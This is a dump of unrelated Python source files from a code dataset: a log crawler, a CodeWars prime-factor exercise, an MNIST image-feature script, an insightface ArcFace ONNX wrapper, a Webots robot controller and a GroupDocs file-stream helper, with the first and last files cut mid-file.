meta['rows'] += df.shape[0]\n meta['memory'] += df.memory_usage().sum() #expressed in bytes\n #to be improved. We can get more of these\n return(meta)\n\n@logger.catch\ndef main():\n file = \"config.json\"\n with open(file) as json_file:\n settings = json.load(json_file)\n logger.info(\"Successfully opened {}\", file)\n session = None #session = logs.create_session(settings['website'])\n raw = {\"values\": 0, \"rows\": 0, \"memory\": 0}\n parsed = {\"values\": 0, \"rows\": 0, \"memory\": 0}\n\n with database.create_connection(settings['database']['name']) as db:\n last_db_update = None\n if (db_utils.has_table(db, \"serv\")):\n last_db_update = db_dates.get_latest_date(db, settings[\"logs\"]['reboot_time'])\n logger.debug(\"db latest update: {}\", last_db_update)\n \n for key in settings['logs']['sufix']:\n logger.debug(\"key: {}\", key)\n dfs = []\n for i in settings['logs']['sufix'][key]:\n df = crawler(session, settings, i)\n dfs.append(df)\n get_metadata(raw, df)\n df = parser(key, dfs)\n get_metadata(parsed, df)\n first_df_date = df['date'].min() #if df older than db, dont store it\n logger.debug(\"{} oldest date: {}\", key, first_df_date)\n if last_db_update and (last_db_update > first_df_date):\n logger.warning(\"Downloaded dataset {} is already logged in db!\", key)\n continue\n database.append_dataframe(db, df, key)\n log_performance(raw, parsed)\n \n\nif __name__ == \"__main__\":\n logger.add(\"GTALifeData_Resume.log\", format=\"{time:YYYY-MM-DD HH:mm:ss.SSS}\\n{message}\", filter=lambda record: \"resume\" in record[\"extra\"])\n logger.add(\"GTALifeData_runtime_{time}.log\", backtrace=True, diagnose=True)\n logger_resume = logger.bind(resume=True)\n logger.info(\"Launching {app_name}\", app_name=sys.argv[0][2:-3])\n main()\n logger.info(\"All tasks executed, closing\")","sub_path":"gtalife_data.py","file_name":"gtalife_data.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"588408816","text":"import asserts as test\n\n\ndef sum_for_list(lst):\n prime_list = []\n\n def produce_factors(num, start):\n for i in range(start, int(num ** 0.5) + 1):\n if num % i == 0:\n return [i] + produce_factors(num/i, i)\n\n return [num]\n\n for n in lst:\n if n < 0:\n n = -n\n prime_list += produce_factors(n, 2)\n\n prime_list = list(set(prime_list))\n prime_list.sort()\n\n return [[p, sum([n for n in lst if n % p == 0])] for p in prime_list]\n\n\nif __name__ == '__main__':\n a = [12, 15]\n test.assert_equal(sum_for_list(a), [[2, 12], [3, 27], [5, 15]])\n b = [12, -15]\n test.assert_equal(sum_for_list(b), [[2, 12], [3, -3], [5, -15]])","sub_path":"python/CodeWars/SumOfList2.py","file_name":"SumOfList2.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"470674462","text":"#!c:/Python34/python.exe\n\n#######################################################################\n# Convert images to phi superpositions\n#\n# Author: Garry Morrison\n# email: garry -at- semantic-db.org\n# Date: 2016-08-1\n# Update: \n# Copyright: GPLv3\n#\n# Usage: ./phi-transform-v2.py ngram-size image-directory\n#\n#######################################################################\n\n\nimport os\nimport sys\nimport glob\nfrom PIL import Image\nimport numpy\nimport copy\nimport math\n\n#from the_semantic_db_code import *\n#from the_semantic_db_functions import *\n#from the_semantic_db_processor import *\n\nif len(sys.argv) < 3:\n print(\"\\nUsage:\")\n print(\" ./phi-transform-v2.py ngram-size image-directory\")\n sys.exit(1)\n\ntry:\n ngram_size = int(sys.argv[1])\nexcept:\n ngram_size = 5\n\n#list_of_files = sys.argv[2:]\nfile_dir = sys.argv[2]\n#print(\"files:\",list_of_files)\n#sys.exit(0)\n\n# switch verbose printing on and off:\nverbose = False\n#verbose = True\n\n# assume these exist. ie, don't test first.\n#destination_phi_transform = \"work-on-handwritten-digits/phi-transformed-images-v2--60k-train/\"\n#destination_phi_transform = \"work-on-handwritten-digits/phi-transformed-images-v2--10k-test/\"\n#destination_phi_images = \"work-on-handwritten-digits/phi-images-v2/\"\n#image_mode = \"RGB\"\nimage_mode = \"L\"\n\n# define our bare-bones superposition class:\nclass superposition(object):\n def __init__(self):\n self.dict = {}\n\n def __str__(self):\n list_of_kets = []\n for key,value in self.dict.items():\n if value == 1:\n s = \"|%s>\" % key\n else:\n s = \"%s|%s>\" % (value,key)\n list_of_kets.append(s)\n return \" + \".join(list_of_kets)\n\n def __iter__(self):\n for key,value in self.dict.items():\n yield key, value\n\n def __len__(self):\n return len(self.dict)\n\n def add(self,str,value=1):\n if str in self.dict:\n self.dict[str] += value\n else:\n self.dict[str] = value\n\n def pair(self): # if the dict is longer than 1 elt, this returns a random pair\n for key,value in self.dict.items():\n return key, value\n\n def rescale(self,t=1):\n if len(self.dict) == 0:\n return superposition()\n# result = copy.deepcopy(self)\n the_max = max(value for key,value in self.dict.items())\n result = superposition()\n if the_max > 0:\n for key,value in self:\n result.dict[key] = t*self.dict[key]/the_max\n return result\n\n def apply_sigmoid(self,sigmoid):\n result = superposition()\n for key,value in self:\n result.dict[key] = sigmoid(self.dict[key])\n return result\n\n\n# our sigmoids (just one for now):\ndef log_1(x,t=None):\n if x <= 0: # maybe tweak this, given that it is log(1 + x), not log(x)\n return 0\n if t == None:\n return math.log(1+x) # default is base e, ie natural logarithm\n return math.log(1+x,t) \n\n\ndef load_simple_sw_into_dict(filename,op):\n op_head = op + \" |\"\n sw_dict = {}\n with open(filename,'r') as f:\n for line in f:\n line = line.strip()\n if line.startswith(op_head):\n try:\n head,tail = line.split('> => ',1)\n label = head.split(' |',1)[1]\n sw_dict[label] = superposition()\n for piece in tail[:-1].split('> + '):\n print(\"piece:\",piece)\n float_piece, string_piece = piece.split('|')\n try: \n float_piece = float(float_piece)\n except:\n float_piece = 1\n sw_dict[label].add(string_piece,float_piece)\n except Exception as e:\n print(\"Exception reason: %s\" % e)\n continue\n return sw_dict\n\ndef print_sw_dict(dict):\n for label,sp in dict.items():\n print(\"|%s> => %s\" % (label,sp))\n\n#filename = \"sw-examples/mnist-60000-train-label-averaged--k_5--t_0_8--layer-1.sw\"\nfilename = \"sw-examples/mnist-test-2000--edge-enhanced--k_5--t_0_4--layer-1.sw\"\nsw_dict = load_simple_sw_into_dict(filename,\"layer-1\")\nprint_sw_dict(sw_dict)\n#sys.exit(0)\n\n# simm that is hopefully faster than the one in the full project.\n# If not, then go home!\n#\ndef fast_simm(A,B):\n if len(A) == 0 or len(B) == 0:\n return 0\n if len(A) == 1 and len(B) == 1:\n a_label, a_value = A.pair()\n b_label, b_value = B.pair()\n\n if a_label != b_label: # put a.label == '' test in here too?\n return 0\n a = max(a_value,0) # just making sure they are >= 0.\n b = max(b_value,0)\n if a == 0 and b == 0: # prevent div by zero.\n return 0\n return min(a,b)/max(a,b)\n# return intersection(A.normalize(),B.normalize()).count_sum() # very slow version!\n\n # now calculate the superposition version of simm, while trying to be as fast as possible:\n try:\n merged = {}\n one_sum = 0\n one = {}\n for label,value in A:\n one[label] = value\n one_sum += value # assume all values in A are >= 0\n merged[label] = True # potentially we could use abs(elt.value)\n\n two_sum = 0\n two = {}\n for label,value in B:\n two[label] = value\n two_sum += value # assume all values in B are >= 0\n merged[label] = True\n\n # prevent div by zero:\n if one_sum == 0 or two_sum == 0:\n return 0\n\n merged_sum = 0\n for key in merged:\n if key in one and key in two:\n v1 = one[key]/one_sum\n v2 = two[key]/two_sum\n merged_sum += min(v1,v2)\n return merged_sum\n except Exception as e:\n print(\"fast_simm exception reason: %s\" % e)\n\ndef pattern_recognition(sw_dict,pattern):\n result = ('',0)\n best_simm = 0\n for label,sp in sw_dict.items():\n similarity = fast_simm(pattern,sp)\n if similarity > best_simm:\n result = (label,similarity)\n best_simm = similarity\n return result\n\n\ndef image_to_sp(image):\n data = list(image.getdata())\n mode = image.mode\n print(\"data:\",data)\n print(\"mode:\",mode)\n r = superposition()\n if mode == \"L\":\n# r.data = [ ket(str(k),value) for k,value in enumerate(data) ]\n for k,value in enumerate(data):\n r.add(str(k),value)\n return r\n if mode in [\"RGB\",\"RGBA\"]: # fix later! We don't need it for mnist digits.\n k = 0\n for value in data:\n R,G,B = value[:3]\n r.data.append(ket(str(k),R))\n r.data.append(ket(str(k+1),G))\n r.data.append(ket(str(k+2),B))\n k += 3\n return r\n\ndef sp_to_image(sp,d=5): # assumes the sp is rescaled to 255 (so range is [0,255] )\n if len(sp) != d*d: # loaded into console, shows all have len 100.\n print(\"wrong length! len sp:\",len(sp))\n sys.exit(1)\n size = (d,d)\n# data = [ int(x.value) for x in sp ]\n# unsorted_data = []\n# for key,value in sp: # NB: these sp's are unsorted! We need to sort by key.\n# unsorted_data.append((key,value))\n unsorted_data = [(key,value) for key,value in sp ] # doesn't seem to be any faster than data.append version.\n# sorted_data = sorted(unsorted_data, key = lambda x: float(x[0]), reverse = False)\n unsorted_data.sort(key = lambda x: float(x[0]), reverse = False)\n\n if verbose:\n print(\"sorted:\",unsorted_data)\n\n data = [ x[1] for x in unsorted_data ]\n\n im = Image.new('L',size) # assume this, rather than RGB. Will work for now.\n im.putdata(data)\n# im.save(destination + \"mnist-test-1--phi-image-%s.bmp\" % count)\n return im\n\n\n# now test these last 2 functions: \n# Yup! Works.\n#image_filename = \"work-on-handwritten-digits/label-average-images/mnist-train-7.bmp\"\n#im = Image.open(image_filename)\n##im.show()\n#our_sp = image_to_sp(im)\n#print(\"our_sp:\",our_sp)\n#print(\"rescaled our_sp:\", our_sp.rescale(255))\n#im2 = sp_to_image(our_sp,28)\n#im2.show()\n\n\n# convert image file into a phi-superposition:\ndef make_phi_superpositions(sw_dict,name,k):\n try:\n base = os.path.basename(name)\n filehead,ext = base.rsplit('.',1)\n im = Image.open(name)\n width,height = im.size\n image_phi_sp = superposition()\n for h in range(0,height-k): # this is the section we need to speed up!\n for w in range(0,width-k):\n# count += 1\n im2 = im.crop((w,h,w + k,h + k))\n our_sp = image_to_sp(im2)\n# phi = our_sp.similar_input(context,\"layer-1\").select_range(1,1).ket()\n phi_label, phi_value = pattern_recognition(sw_dict,our_sp)\n if phi_label == \"\":\n continue\n# phi = ket(\"phi: 0\") # may as well use this as a data point too. Now testing time. Nah. Doesn't improve the result.\n# image_phi_sp += phi # map image to phi sp\n image_phi_sp.add(phi_label,phi_value)\n return image_phi_sp\n except Exception as e:\n print(\"make_phi_superpositions reason:\",e)\n return superposition()\n\n\n\ndestination = \"sw-examples/image-phi-superpositions--train-60k--using-edge-enhanced-features--k_5--t_0_4.sw\"\nwith open(destination,'w') as f:\n# f.write(\"%s |%s> => %s\\n\" % (op,label,sp))\n\n# given a directory, and assume it exists:\n count = 0\n for filename in glob.glob(file_dir + \"/*\"):\n\n image_phi_sp = make_phi_superpositions(sw_dict, filename, ngram_size)\n base = os.path.basename(filename)\n filehead,ext = base.rsplit('.',1)\n# context2.learn(\"train-phi-sp\",\"image: \" + filehead,image_phi_sp)\n f.write(\"train-phi-sp |image: %s> => %s\\n\" % (filehead,image_phi_sp))\n\n sp = image_phi_sp.apply_sigmoid(log_1) # let's do log(1+x) more directly. Hopefully it is faster. Bah! No change in speed!\n count += 1\n print(\"count:\",count)\n print(\"log-phi-sp:\",sp)\n# context2.learn(\"train-log-phi-sp\",\"image: \" + filehead,sp)\n f.write(\"train-log-phi-sp |image: %s> => %s\\n\\n\" % (filehead,sp))\n# break\n\n\nsys.exit(0)\n\n#context2.save(\"sw-examples/image-phi-superpositions-test-1000--%s--t_0_4--v2.sw\" % str(ngram_size))\n#context2.save(\"sw-examples/image-phi-superpositions--test-2000--using-edge-enhanced-features--k_5--t_0_4--phi0.sw\")\ncontext2.save(\"sw-examples/image-phi-superpositions--train-60k--using-edge-enhanced-features--k_5--t_0_4.sw\")\n\nsys.exit(0)\n\n\n# some of the numpy code is from here:\n# http://stackoverflow.com/questions/17291455/how-to-get-an-average-picture-from-100-pictures-using-pil\ndef phi_transform_image(sw_dict,name,k):\n try:\n base = os.path.basename(name)\n filehead,ext = base.rsplit('.',1)\n im = Image.open(name)\n width,height = im.size\n if image_mode == \"L\":\n arr = numpy.zeros((height,width),numpy.float)\n elif image_mode == \"RGB\":\n arr = numpy.zeros((height,width,3),numpy.float)\n count = 0\n image_phi_sp = superposition() # switch off image_phi_sp creation, see if it speeds things.\n for h in range(0,height-k):\n for w in range(0,width-k):\n count += 1\n im2 = im.crop((w,h,w + k,h + k))\n our_sp = image_to_sp(im2)\n# phi = our_sp.similar_input(context,\"layer-1\").select_range(1,1).ket() # old method, presumably slower.\n phi_label, phi_value = pattern_recognition(sw_dict,our_sp) # this better be faster, or I have wasted a lot of time!\n if phi_label == \"\":\n continue\n phi_similarity = phi_value\n# image_phi_sp += phi # map image to phi sp\n# phi_sp = phi.apply_op(context,\"layer-1\").rescale(255)\n# tweaked_phi_sp = phi_sp.apply_sigmoid(subtraction_invert,255).multiply(phi_similarity).apply_sigmoid(subtraction_invert,255)\n\n image_phi_sp.add(phi_label,phi_value)\n phi_sp = sw_dict[phi_label].rescale(255)\n tweaked_phi_sp = phi_sp # look into full tweaked_phi_sp later, since we need sigmoids and multiply.\n\n if image_mode == \"L\":\n phi_im = sp_to_image(tweaked_phi_sp) \n im3 = Image.new('L',(width,height),\"white\")\n elif image_mode == \"RGB\":\n phi_im = sp_to_rgb_image(tweaked_phi_sp)\n im3 = Image.new('RGB',(width,height),\"white\")\n\n if verbose:\n print(\"phi: %s|%s>\" % (phi_value,phi_label))\n print(\"phi sp:\",phi_sp)\n# sys.exit(0)\n\n im3.paste(phi_im,(w,h))\n# im3.save(destination + \"mnist-test-1--phi-image-%s-%s.bmp\" % (w,h))\n image_array = numpy.array(im3,dtype=numpy.float)\n# arr += image_array * phi_similarity\n arr += image_array\n\n # see what we have:\n# phi_im.show()\n# im3.show()\n# if count > 1000:\n# sys.exit(0)\n# break\n arr = arr/count # average the final array\n\n # normalize to range [0,255]:\n image_min = numpy.amin(arr)\n print(\"image min:\",image_min)\n arr -= image_min\n new_max = numpy.amax(arr)\n arr *= 255/new_max\n\n # Round values in array and cast as 8-bit integer\n arr=numpy.array(numpy.round(arr),dtype=numpy.uint8)\n\n # Generate, save and preview final image\n if image_mode == \"L\":\n out=Image.fromarray(arr,mode=\"L\")\n elif image_mode == \"RGB\":\n out=Image.fromarray(arr,mode=\"RGB\")\n# out.save(\"Average.png\")\n out.save(\"%s%s.png\" % (destination_phi_transform,filehead))\n# out.show()\n# sys.exit(0)\n\n return image_phi_sp\n return None\n except Exception as e:\n print(\"phi_transform_image reason:\",e)\n return superposition()\n\n\n#for filename in list_of_files:\n# if given a directory:\n#if os.path.isdir(file_dir): # assume it exists, so I don't need to change indent.\nfor filename in glob.glob(file_dir + \"/*\"):\n\n image_phi_sp = phi_transform_image(sw_dict,filename,ngram_size)\n# print(\"image_phi_sp:\",image_phi_sp)\n# sys.exit(0) \n continue\n\n base = os.path.basename(filename)\n filehead,ext = base.rsplit('.',1)\n# context2.learn(\"phi-sp\",\"image: \" + filehead,image_phi_sp)\n\n # convert image_phi_sp to an actual image:\n# empty = show_range(ket(\"phi: 1\"),ket(\"phi: 289\")).multiply(0) # hard code in 289 just for now!\n empty = show_range(ket(\"phi: 1\"),ket(\"phi: 289\")) # don't mult by 0, so coeffs are in [1,... instead of [0,...\n sp = (image_phi_sp + empty).ket_sort().apply_sigmoid(log).rescale(255)\n print(\"phi-sp:\",sp)\n context2.learn(\"log-phi-sp\",\"image: \" + filehead,sp.drop())\n phi_image = sp_to_image(sp,17)\n# phi_image.show()\n phi_image.save(\"%s%s.png\" % (destination_phi_images,filehead))\n\n#context2.save(\"sw-examples/image-phi-superpositions--label-average--test-2000--%s--t_0_8.sw\" % str(ngram_size))\n\n\n#context.print_universe()\n#context.save(\"sw-examples/image-ngram-superpositions-%s.sw\" % str(ngram_size))\n\n\nsys.exit(0)\n#context = context_list(\"phi transform of images\")\n#context2 = context_list(\"images to phi superpositions\")\n#context.load(\"sw-examples/mnist-test-1--0_5-similarity.sw\")\n#context.load(\"sw-examples/mnist-1000--layer-1--0_5.sw\")\n#context.load(\"sw-examples/small-lenna-edge-40--layer-1--0_7.sw\")\n#context.load(\"sw-examples/small-lenna-edge-40--layer-1--0_4.sw\")\n#context.load(\"sw-examples/mnist-10000-train--k_5--t_0_5--layer-1.sw\")\n#context.load(\"sw-examples/mnist-10000-train--k_5--t_0_4--layer-1.sw\")\n#context.load(\"sw-examples/mnist-60000-train-label-averaged--k_5--t_0_8--layer-1.sw\")\n\n#sys.exit(0)\n\n\n\ndef first_image_to_sp(image): # if the image is square, then this mapping to sp is invertable\n width,height = image.size\n i = 1\n r = fast_superposition()\n for h in range(0,height):\n for w in range(0,width):\n R,G,B = image.getpixel((w,h))[:3]\n r += ket(str(i),R) + ket(str(i+1),G) + ket(str(i+2),B)\n i += 3\n return r.superposition()\n\ndef image_to_sp(image):\n data = list(image.getdata())\n mode = image.mode\n print(\"data:\",data)\n print(\"mode:\",mode)\n r = superposition()\n if mode == \"L\":\n r.data = [ ket(str(k),value) for k,value in enumerate(data) ]\n return r\n if mode in [\"RGB\",\"RGBA\"]:\n k = 0\n for value in data:\n R,G,B = value[:3]\n r.data.append(ket(str(k),R))\n r.data.append(ket(str(k+1),G))\n r.data.append(ket(str(k+2),B))\n k += 3\n return r\n\ndef sp_to_image(sp,d=5): # assumes the sp is rescaled to 255 (so range is [0,255] )\n# d = 10 # hard wire in d = 10. This fixed the bug.\n# d = 5\n if len(sp) != d*d: # loaded into console, shows all have len 100.\n print(\"wrong length! len sp:\",len(sp))\n sys.exit(1)\n size = (d,d)\n data = [ int(x.value) for x in sp ]\n im = Image.new('L',size) # assume this, rather than RGB. Will work for now.\n im.putdata(data)\n# im.save(destination + \"mnist-test-1--phi-image-%s.bmp\" % count)\n return im\n\ndef sp_to_rgb_image(sp): # assumes the sp is rescaled to 255 (so range is [0,255] )\n d = 10 # hard wire in d = 10. This fixed the bug.\n if len(sp) != 3*d*d:\n print(\"wrong length! len sp:\",len(sp))\n size = (d,d)\n data = [ int(x.value) for x in sp ]\n im_data = [ (data[i],data[i+1],data[i+2]) for i in range(0,len(data),3) ]\n im = Image.new('RGB',size)\n im.putdata(im_data)\n return im\n\n# does phi-transform even use this function??\ndef image_to_ngrams(context,name,k):\n try:\n base = os.path.basename(name)\n filehead,ext = base.rsplit('.',1)\n im = Image.open(name)\n width,height = im.size\n for h in range(0,height-k):\n for w in range(0,width-k):\n im2 = im.crop((w,h,w + k,h + k))\n ket_name = \"%s: %s: %s: %s\" % (filehead,str(k),str(w),str(h))\n r = image_to_sp(im2)\n context.learn(\"layer-0\",ket_name,r)\n except Exception as e:\n print(\"image_to_ngrams reason:\",e)\n return\n\n# some of the numpy code is from here:\n# http://stackoverflow.com/questions/17291455/how-to-get-an-average-picture-from-100-pictures-using-pil\ndef phi_transform_image(context,name,k):\n try:\n base = os.path.basename(name)\n filehead,ext = base.rsplit('.',1)\n im = Image.open(name)\n width,height = im.size\n if image_mode == \"L\":\n arr = numpy.zeros((height,width),numpy.float)\n elif image_mode == \"RGB\":\n arr = numpy.zeros((height,width,3),numpy.float)\n count = 0\n image_phi_sp = fast_superposition()\n for h in range(0,height-k):\n for w in range(0,width-k):\n count += 1\n im2 = im.crop((w,h,w + k,h + k))\n our_sp = image_to_sp(im2)\n phi = our_sp.similar_input(context,\"layer-1\").select_range(1,1).ket()\n if phi.label == \"\":\n continue\n phi_similarity = phi.value\n image_phi_sp += phi # map image to phi sp\n phi_sp = phi.apply_op(context,\"layer-1\").rescale(255)\n tweaked_phi_sp = phi_sp.apply_sigmoid(subtraction_invert,255).multiply(phi_similarity).apply_sigmoid(subtraction_invert,255)\n if image_mode == \"L\":\n phi_im = sp_to_image(tweaked_phi_sp) # tidy this later!\n im3 = Image.new('L',(width,height),\"white\")\n elif image_mode == \"RGB\":\n phi_im = sp_to_rgb_image(tweaked_phi_sp)\n im3 = Image.new('RGB',(width,height),\"white\")\n print(\"phi:\",phi)\n print(\"phi sp:\",phi_sp)\n im3.paste(phi_im,(w,h))\n# im3.save(destination + \"mnist-test-1--phi-image-%s-%s.bmp\" % (w,h))\n image_array = numpy.array(im3,dtype=numpy.float)\n# arr += image_array * phi_similarity\n arr += image_array\n\n # see what we have:\n# phi_im.show()\n# im3.show()\n# if count > 1000:\n# sys.exit(0)\n# break\n arr = arr/count # average the final array\n\n # normalize to range [0,255]:\n image_min = numpy.amin(arr)\n print(\"image min:\",image_min)\n arr -= image_min\n new_max = numpy.amax(arr)\n arr *= 255/new_max\n\n # Round values in array and cast as 8-bit integer\n arr=numpy.array(numpy.round(arr),dtype=numpy.uint8)\n\n # Generate, save and preview final image\n if image_mode == \"L\":\n out=Image.fromarray(arr,mode=\"L\")\n elif image_mode == \"RGB\":\n out=Image.fromarray(arr,mode=\"RGB\")\n# out.save(\"Average.png\")\n out.save(\"%s%s.png\" % (destination_phi_transform,filehead))\n# out.show()\n return image_phi_sp.superposition()\n except Exception as e:\n print(\"phi_transform_image reason:\",e)\n return superposition()\n\n\n#for filename in list_of_files:\n# if given a directory:\n#if os.path.isdir(file_dir): # assume it exists, so I don't need to change indent.\nfor filename in glob.glob(file_dir + \"/*\"):\n\n# image_to_ngrams(context,filename,ngram_size)\n image_phi_sp = phi_transform_image(context,filename,ngram_size)\n base = os.path.basename(filename)\n filehead,ext = base.rsplit('.',1)\n context2.learn(\"phi-sp\",\"image: \" + filehead,image_phi_sp) \n\n # convert image_phi_sp to an actual image:\n# empty = show_range(ket(\"phi: 1\"),ket(\"phi: 289\")).multiply(0) # hard code in 289 just for now!\n empty = show_range(ket(\"phi: 1\"),ket(\"phi: 289\")) # don't mult by 0, so coeffs are in [1,... instead of [0,...\n sp = (image_phi_sp + empty).ket_sort().apply_sigmoid(log).rescale(255)\n print(\"phi-sp:\",sp)\n context2.learn(\"log-phi-sp\",\"image: \" + filehead,sp.drop())\n phi_image = sp_to_image(sp,17)\n# phi_image.show() \n phi_image.save(\"%s%s.png\" % (destination_phi_images,filehead))\n\n#context2.save(\"sw-examples/image-phi-superpositions--label-average--test-2000--%s--t_0_8.sw\" % str(ngram_size))\n\n\n#context.print_universe()\n#context.save(\"sw-examples/image-ngram-superpositions-%s.sw\" % str(ngram_size))\n\n\n","sub_path":"work-on-images/phi-superpositions-v3.py","file_name":"phi-superpositions-v3.py","file_ext":"py","file_size_in_byte":21546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"318970433","text":"# -*- coding: utf-8 -*-\n# @Organization : insightface.ai\n# @Author : Jia Guo\n# @Time : 2021-05-04\n# @Function : \n\nfrom __future__ import division\nimport numpy as np\nimport cv2\nimport onnx\nimport onnxruntime\nfrom ..utils import face_align\n\n__all__ = [\n 'ArcFaceONNX',\n]\n\n\nclass ArcFaceONNX:\n def __init__(self, model_file=None, session=None):\n assert model_file is not None\n self.model_file = model_file\n self.session = session\n self.taskname = 'recognition'\n find_sub = False\n find_mul = False\n model = onnx.load(self.model_file)\n graph = model.graph\n for nid, node in enumerate(graph.node[:8]):\n #print(nid, node.name)\n if node.name.startswith('Sub') or node.name.startswith('_minus'):\n find_sub = True\n if node.name.startswith('Mul') or node.name.startswith('_mul'):\n find_mul = True\n if find_sub and find_mul:\n #mxnet arcface model\n input_mean = 0.0\n input_std = 1.0\n else:\n input_mean = 127.5\n input_std = 127.5\n self.input_mean = input_mean\n self.input_std = input_std\n #print('input mean and std:', self.input_mean, self.input_std)\n if self.session is None:\n self.session = onnxruntime.InferenceSession(self.model_file, None)\n input_cfg = self.session.get_inputs()[0]\n input_shape = input_cfg.shape\n input_name = input_cfg.name\n self.input_size = tuple(input_shape[2:4][::-1])\n self.input_shape = input_shape\n outputs = self.session.get_outputs()\n output_names = []\n for out in outputs:\n output_names.append(out.name)\n self.input_name = input_name\n self.output_names = output_names\n assert len(self.output_names)==1\n self.output_shape = outputs[0].shape\n\n def prepare(self, ctx_id, **kwargs):\n if ctx_id<0:\n self.session.set_providers(['CPUExecutionProvider'])\n\n def get(self, img, face):\n aimg = face_align.norm_crop(img, landmark=face.kps)\n face.embedding = self.get_feat(aimg).flatten()\n return face.embedding\n\n def compute_sim(self, feat1, feat2):\n from numpy.linalg import norm\n feat1 = feat1.ravel()\n feat2 = feat2.ravel()\n sim = np.dot(feat1, feat2) / (norm(feat1) * norm(feat2))\n return sim\n\n def get_feat(self, imgs):\n if not isinstance(imgs, list):\n imgs = [imgs]\n input_size = self.input_size\n \n blob = cv2.dnn.blobFromImages(imgs, 1.0 / self.input_std, input_size,\n (self.input_mean, self.input_mean, self.input_mean), swapRB=True)\n net_out = self.session.run(self.output_names, {self.input_name: blob})[0]\n return net_out\n\n def forward(self, batch_data):\n blob = (batch_data - self.input_mean) / self.input_std\n net_out = self.session.run(self.output_names, {self.input_name: blob})[0]\n return net_out\n\n\n","sub_path":"python-package/insightface/model_zoo/arcface_onnx.py","file_name":"arcface_onnx.py","file_ext":"py","file_size_in_byte":3080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"235241645","text":"from controller import Robot\nfrom controller import InertialUnit\nfrom controller import LED\nfrom controller import DistanceSensor\n\nnum_ramps=0\ninc=0\ndec=0\nif __name__ == \"__main__\":\n robot = Robot()\n imu=InertialUnit('inertial unit')\n led_incline=robot.getDevice('led_green')\n led_decline=robot.getDevice('led_red')\n s1 = robot.getDevice(\"so\");\n \n timestep = 64\n max_speed = 6.28\n scale = 0.6\n \n back_left_motor= robot.getDevice('back left wheel')\n back_right_motor= robot.getDevice('back right wheel')\n front_left_motor= robot.getDevice('front left wheel')\n front_right_motor= robot.getDevice('front right wheel')\n back_left_motor.setPosition(float('inf'))\n back_left_motor.setVelocity(0.0)\n back_right_motor.setPosition(float('inf'))\n back_right_motor.setVelocity(0.0)\n front_left_motor.setPosition(float('inf'))\n front_left_motor.setVelocity(0.0)\n front_right_motor.setPosition(float('inf'))\n front_right_motor.setVelocity(0.0)\n \n \n # Main loop:\n # - perform simulation steps until Webots is stopping the controller\n while robot.step(timestep) != -1:\n back_left_motor.setVelocity(scale*max_speed)\n back_right_motor.setVelocity(scale*max_speed)\n front_left_motor.setVelocity(scale*max_speed)\n front_right_motor.setVelocity(scale* max_speed)\n imu.enable(20)\n s1.enable(20)\n value1=imu.getRollPitchYaw()\n \n \n if value1[0]>0.5 :\n if led_incline.get()==0:\n inc=inc+1\n led_incline.set(1)\n elif value1[0]<-0.5:\n if led_decline.get()==0:\n dec=dec+1\n if dec==1 and inc==0:\n dec=dec-1 \n led_decline.set(1)\n \n if inc==1 & dec==1:\n num_ramps=num_ramps+1\n inc=0\n dec=0\n else: \n led_incline.set(0)\n led_decline.set(0)\n \n \n \n if s1.getValue()>900.0:\n back_left_motor.setVelocity(0)\n back_right_motor.setVelocity(0)\n front_left_motor.setVelocity(0)\n front_right_motor.setVelocity(0)\n imu.disable()\n s1.disable()\n print('Number of ramps : ', num_ramps)\n break\n # Enter here exit cleanup code.\n","sub_path":"Webots/worlds/stopAtObstacle.py","file_name":"stopAtObstacle.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"468217968","text":"#!/usr/bin/env python\n\"\"\"\nCopyright 2012 GroupDocs.\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\nimport os\nimport mimetypes\nimport urlparse\n\nclass FileStream(object):\n \"\"\"This class encapsulates data needed either for file upload or download. All properties are initialized lazily on first access.\n \n To use this class for file upload initialize it with absolute path to file on your filesystem.\n \n To use this class for file download call fromHttp(response) method.\n \"\"\"\n \n def __init__(self, filePath=None, response=None, stream=None):\n self.__response = response # used for file download\n self.__filePath = filePath # used for file upload\n self.__fileName = None\n self.__contentType = None\n self.__size = None\n self.__inputStream = stream\n \n @classmethod\n def fromFile(cls, filePath):\n \"\"\"filePath is an absolute path to file on your filesystem.\n \"\"\"\n return cls(filePath, None)\n \n @classmethod\n def fromStream(cls, stream, size, contentType=\"application/octet-stream\"):\n \"\"\"stream is a file-like object, i.e. stream = fopen(filename)\n \"\"\"\n if not size or int(size) <= 0:\n raise ValueError('Invalid stream size provided')\n \n instance = cls(None, None, stream)\n instance.size = size\n instance.contentType = contentType\n return instance\n \n @classmethod\n def fromHttp(cls, response):\n \"\"\"response is a file-like object with two additional methods: geturl() and info()\n \"\"\"\n return cls(None, response)\n \n @property\n def fileName(self):\n if self.__fileName == None and self.__filePath != None:\n self.__fileName = os.path.basename(self.__filePath)\n elif self.__fileName == None and self.__response != None:\n self.__fileName = self.__getValueFromCD('filename') or self.__getFileNameFromUrl(self.__response.url)\n return self.__fileName\n \n @fileName.setter\n def fileName(self, value):\n self.__fileName = value\n\n @property\n def contentType(self):\n if self.__contentType == None and self.__filePath != None:\n self.__contentType = mimetypes.guess_type(self.__filePath)[0] or \"application/octet-stream\"\n elif self.__contentType == None and self.__response != None:\n self.__contentType = self.__response.info()['Content-Type'] if 'Content-Type' in self.__response.info() else None\n return self.__contentType\n \n @contentType.setter\n def contentType(self, value):\n self.__contentType = value\n\n @property\n def size(self):\n if self.__size == None and self.__filePath != None:\n self.__size = os.path.getsize(self.__filePath)\n elif self.__size == None and self.__response != None:\n self.__size = self.__getValueFromCD('size')\n if self.__size == None and 'Content-Length' in self.__response.info():\n self.__size = self.__response.info()['Content-Length'] \n return self.__size\n \n @size.setter\n def size(self, value):\n self.__size = value\n\n 